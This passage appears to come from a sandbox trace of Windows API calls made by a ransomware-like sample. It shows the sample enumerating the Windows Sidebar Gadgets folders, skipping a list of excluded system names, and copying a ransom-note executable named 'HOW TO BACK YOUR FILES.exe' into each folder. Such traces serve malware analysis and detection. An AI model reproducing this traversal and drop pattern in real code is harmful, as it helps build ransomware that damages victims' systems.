Sidebar\\Shared Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0115.113] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.113] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0115.113] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0115.113] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.113] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.113] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0115.114] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0115.114] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0115.114] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cf1c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0115.114] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0115.114] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cf1c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0115.114] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0115.114] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7810 [0115.114] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets" [0115.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f21d0 | out: hHeap=0x2b0000) returned 1 [0115.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0115.114] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets") returned 46 [0115.114] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets" [0115.114] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0115.114] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0115.115] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0115.115] GetLastError () returned 0x0 [0115.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0115.115] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0115.115] CloseHandle (hObject=0x120) returned 1 [0115.115] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0115.115] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0115.115] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0115.115] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.115] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0115.115] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0115.115] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.116] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.116] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0115.116] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0115.116] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0115.116] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x520a9e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x520a9e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="aoldtz.exe") returned 1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2=".") returned 1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="..") returned 1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="windows") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="bootmgr") returned 1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="temp") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="pagefile.sys") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="boot") returned 1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="ids.txt") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="ntuser.dat") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="perflogs") returned -1 [0115.116] lstrcmpiW (lpString1="Calendar.Gadget", lpString2="MSBuild") returned -1 [0115.116] lstrlenW (lpString="Calendar.Gadget") returned 15 [0115.116] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*") returned 48 [0115.116] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Calendar.Gadget" | out: lpString1="Calendar.Gadget") returned="Calendar.Gadget" [0115.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0115.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0115.116] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0115.116] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5205dba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5205dba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="aoldtz.exe") returned 1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2=".") returned 1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="..") returned 1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="windows") returned -1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="bootmgr") returned 1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="temp") returned -1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="pagefile.sys") returned -1 [0115.116] lstrcmpiW (lpString1="Clock.Gadget", lpString2="boot") returned 1 [0115.117] lstrcmpiW (lpString1="Clock.Gadget", lpString2="ids.txt") returned -1 [0115.117] lstrcmpiW (lpString1="Clock.Gadget", lpString2="ntuser.dat") returned -1 [0115.117] lstrcmpiW (lpString1="Clock.Gadget", lpString2="perflogs") returned -1 [0115.117] lstrcmpiW (lpString1="Clock.Gadget", lpString2="MSBuild") returned -1 [0115.117] lstrlenW (lpString="Clock.Gadget") returned 12 [0115.117] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget") returned 62 [0115.117] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Clock.Gadget" | out: lpString1="Clock.Gadget") returned="Clock.Gadget" [0115.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0115.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1708 [0115.117] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0115.117] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51ee0de0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51ee0de0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="aoldtz.exe") returned 1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2=".") returned 1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="..") returned 1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="windows") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="bootmgr") returned 1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="temp") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="pagefile.sys") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="boot") returned 1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="ids.txt") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="ntuser.dat") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="perflogs") returned -1 [0115.117] lstrcmpiW (lpString1="CPU.Gadget", lpString2="MSBuild") returned -1 [0115.117] lstrlenW (lpString="CPU.Gadget") returned 10 [0115.117] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget") returned 59 [0115.117] lstrcpyW (in: lpString1=0x2cce45e, lpString2="CPU.Gadget" | out: lpString1="CPU.Gadget") returned="CPU.Gadget" [0115.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0115.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1788 [0115.117] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0115.117] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51e94b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51e94b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0115.117] lstrcmpiW (lpString1="Currency.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.117] lstrcmpiW (lpString1="Currency.Gadget", lpString2="aoldtz.exe") returned 1 [0115.117] lstrcmpiW (lpString1="Currency.Gadget", lpString2=".") returned 1 [0115.117] lstrcmpiW (lpString1="Currency.Gadget", lpString2="..") returned 1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="windows") returned -1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="bootmgr") returned 1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="temp") returned -1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="pagefile.sys") returned -1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="boot") returned 1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="ids.txt") returned -1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="ntuser.dat") returned -1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="perflogs") returned -1 [0115.118] lstrcmpiW (lpString1="Currency.Gadget", lpString2="MSBuild") returned -1 [0115.118] lstrlenW (lpString="Currency.Gadget") returned 15 [0115.118] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget") returned 57 [0115.118] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Currency.Gadget" | out: lpString1="Currency.Gadget") returned="Currency.Gadget" [0115.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0115.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0518 [0115.118] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0115.118] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cf1c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0115.118] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0115.118] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51e48860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51e48860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="aoldtz.exe") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2=".") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="..") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="windows") returned -1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="bootmgr") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="temp") returned -1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="pagefile.sys") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="boot") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="ids.txt") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="ntuser.dat") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="perflogs") returned 1 [0115.118] lstrcmpiW (lpString1="PicturePuzzle.Gadget", lpString2="MSBuild") returned 1 [0115.118] lstrlenW (lpString="PicturePuzzle.Gadget") returned 20 [0115.118] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget") returned 62 [0115.119] lstrcpyW (in: lpString1=0x2cce45e, lpString2="PicturePuzzle.Gadget" | out: lpString1="PicturePuzzle.Gadget") returned="PicturePuzzle.Gadget" [0115.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0115.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0115.119] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0115.119] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51dfc5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51dfc5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="aoldtz.exe") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2=".") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="..") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="windows") returned -1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="bootmgr") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="temp") returned -1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="pagefile.sys") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="boot") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="ids.txt") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="ntuser.dat") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="perflogs") returned 1 [0115.119] lstrcmpiW (lpString1="RSSFeeds.Gadget", lpString2="MSBuild") returned 1 [0115.119] lstrlenW (lpString="RSSFeeds.Gadget") returned 15 [0115.119] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget") returned 67 [0115.119] lstrcpyW (in: lpString1=0x2cce45e, lpString2="RSSFeeds.Gadget" | out: lpString1="RSSFeeds.Gadget") returned="RSSFeeds.Gadget" [0115.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0115.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0380 [0115.119] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0115.119] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51db02e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51db02e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="aoldtz.exe") returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2=".") returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="..") returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="windows") returned -1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="bootmgr") returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="temp") returned -1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="pagefile.sys") returned 1 [0115.119] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="boot") returned 1 [0115.120] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="ids.txt") returned 1 [0115.120] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="ntuser.dat") returned 1 [0115.120] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="perflogs") returned 1 [0115.120] lstrcmpiW (lpString1="SlideShow.Gadget", lpString2="MSBuild") returned 1 [0115.120] lstrlenW (lpString="SlideShow.Gadget") returned 16 [0115.120] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget") returned 62 [0115.120] lstrcpyW (in: lpString1=0x2cce45e, lpString2="SlideShow.Gadget" | out: lpString1="SlideShow.Gadget") returned="SlideShow.Gadget" [0115.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0115.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0270 [0115.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0115.120] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="aoldtz.exe") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2=".") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="..") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="windows") returned -1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="bootmgr") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="temp") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="pagefile.sys") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="boot") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="ids.txt") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="ntuser.dat") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="perflogs") returned 1 [0115.120] lstrcmpiW (lpString1="Weather.Gadget", lpString2="MSBuild") returned 1 [0115.120] lstrlenW (lpString="Weather.Gadget") returned 14 [0115.120] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget") returned 63 [0115.120] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Weather.Gadget" | out: lpString1="Weather.Gadget") returned="Weather.Gadget" [0115.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0115.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f02f8 [0115.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) 